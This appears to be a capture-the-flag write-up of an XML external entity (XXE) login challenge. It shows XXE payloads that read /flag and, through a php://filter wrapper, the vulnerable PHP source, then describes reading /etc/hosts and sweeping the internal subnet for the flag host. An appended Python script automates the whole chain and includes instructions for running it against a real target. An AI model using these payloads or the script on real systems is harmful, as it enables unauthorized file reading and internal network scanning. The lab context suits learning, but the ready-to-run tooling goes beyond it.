Capturing the login submission in the proxy shows the request body is XML, so this is XXE.
First use an XXE PoC to read /flag:
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM "file:///flag">
]>
<user>
<username>&file;</username>
<password>hack</password>
</user>
The flag isn't there, so read the app's source instead.
Reading it with the file:// protocol didn't work, so switch to the php:// wrapper:
<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE hack [
<!ENTITY file SYSTEM "php://filter/read=convert.base64-encode/resource=/var/www/html/doLogin.php">
]>
<user>
<username>&file;</username>
<password>hack</password>
</user>
Read successfully (base64-decoded):
<?php
/**
* author: c0ny1
* date: 2018-2-7
*/
$USERNAME = 'admin'; // account
$PASSWORD = '024b87931a03f738fff6693ce0a78c88'; // password (hash)
$result = null;
libxml_disable_entity_loader(false); // external entity loading explicitly turned on
$xmlfile = file_get_contents('php://input');
try{
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); // LIBXML_NOENT expands entities, LIBXML_DTDLOAD loads the DTD: together with the line above, this is what makes the endpoint XXE-vulnerable
$creds = simplexml_import_dom($dom);
$username = $creds->username;
$password = $creds->password;
if($username == $USERNAME && $password == $PASSWORD){
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
}else{
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
}
}catch(Exception $e){
$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}
header('Content-Type: text/html; charset=utf-8');
echo $result;
?>
Emmmm, nothing obvious here. Searched around and found that XXE can be used to hit the internal network.
Tried it, no luck.
Read the user info.
Tried to read the shell history, that failed.
Looked at the writeup, emmmm, there's no way to think of this without a hint, right????? (Maybe I'm just too noob.)
It really is about hitting the internal network,
but by directly reading /etc/hosts to look for live hosts.
Visited that host, nothing there, so ran Burp to brute-force the live hosts in the range.
Found one host that serves the flag directly.
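The whole chain above scripted in Python, as an added example that is not code from the original writeup or from the challenge: the same entity payload as the PoC, the php://filter read of doLogin.php decoded back to source, /etc/hosts parsed for internal addresses, and the /24 sweep that the Burp step does by hand. The target URL, the sample /etc/hosts contents and the sample <result> response are constructed placeholders. The base64 wrapper matters because it turns the file into inert text that the parser reflects back unchanged, which is why it works where plain file:// on the .php source did not. Treating a non-empty reflected <msg> as "host answered" is an assumption about how this endpoint reflects the entity; check it against real responses before trusting the sweep.

```python
import base64
import ipaddress
import re
import urllib.request
from typing import Callable, List

# Hypothetical target URL; the writeup does not give one.
TARGET = "http://target.local/doLogin.php"

# Constructed sample data (not captured from the challenge).
# msg is base64("<?php\n$a=1;\n"), in the <result> shape doLogin.php emits.
SAMPLE_RESPONSE = "<result><code>0</code><msg>PD9waHAKJGE9MTsK</msg></result>"
SAMPLE_HOSTS = """127.0.0.1\tlocalhost
::1\tlocalhost ip6-localhost ip6-loopback
172.18.0.3\tweb
"""


def build_xxe_payload(uri: str) -> str:
    """Same document shape as the writeup's PoC, with the external entity pointing at uri."""
    return (
        '<?xml version="1.0" encoding="utf-8" ?>\n'
        "<!DOCTYPE hack [\n"
        f'<!ENTITY file SYSTEM "{uri}">\n'
        "]>\n"
        "<user>\n"
        "<username>&file;</username>\n"
        "<password>hack</password>\n"
        "</user>\n"
    )


def php_filter_uri(path: str) -> str:
    """php://filter wrapper: base64 keeps a source file from being parsed as XML."""
    return f"php://filter/read=convert.base64-encode/resource={path}"


def extract_msg(response: str) -> str:
    """Pull the reflected <msg> out of the <result> document the endpoint returns."""
    m = re.search(r"<msg>(.*?)</msg>", response, re.S)
    if m is None:
        raise ValueError("no <msg> element in response")
    return m.group(1)


def decode_source(response: str) -> str:
    """Decode a base64-wrapped file read back into text."""
    return base64.b64decode(extract_msg(response)).decode("utf-8", "replace")


def send_payload(xml: str, url: str = TARGET, timeout: float = 5.0) -> str:
    """POST the XML body the way the login form does. Network only; the offline checks never call it."""
    req = urllib.request.Request(
        url, data=xml.encode("utf-8"),
        headers={"Content-Type": "application/xml"}, method="POST",
    )
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def parse_hosts(hosts_text: str) -> List[str]:
    """IPv4 addresses listed in /etc/hosts, skipping comments and loopback."""
    ips = []
    for line in hosts_text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        try:
            ip = ipaddress.ip_address(line.split()[0])
        except ValueError:
            continue
        if ip.version == 4 and not ip.is_loopback:
            ips.append(str(ip))
    return ips


def candidate_hosts(ip: str) -> List[str]:
    """Every usable address in the /24 around ip: the range the Burp sweep iterates over."""
    net = ipaddress.ip_network(f"{ip}/24", strict=False)
    return [str(h) for h in net.hosts()]


def host_is_live(response: str) -> bool:
    """Assumption: a non-empty reflected <msg> means the entity fetch returned content."""
    return extract_msg(response) != ""


def sweep(probe: Callable[[str], str], ips: List[str]) -> List[str]:
    """probe(ip) returns the raw response for an entity pointing at http://ip/."""
    return [ip for ip in ips if host_is_live(probe(ip))]


def xxe_probe(ip: str) -> str:
    """Live probe against TARGET (assumed URL): entity fetches http://ip/ from inside the box."""
    return send_payload(build_xxe_payload(f"http://{ip}/"))


if __name__ == "__main__":
    # Offline walk-through on the constructed samples.
    print(decode_source(SAMPLE_RESPONSE))
    internal = parse_hosts(SAMPLE_HOSTS)
    print(internal, len(candidate_hosts(internal[0])))
    # Against a real target: sweep(xxe_probe, candidate_hosts(internal[0]))
```

Against a real box, replace TARGET, read /etc/hosts with `send_payload(build_xxe_payload(php_filter_uri("/etc/hosts")))` and run `sweep(xxe_probe, ...)` over the /24; a slow host will time out inside urlopen, so wrap the probe in try/except if the range is noisy.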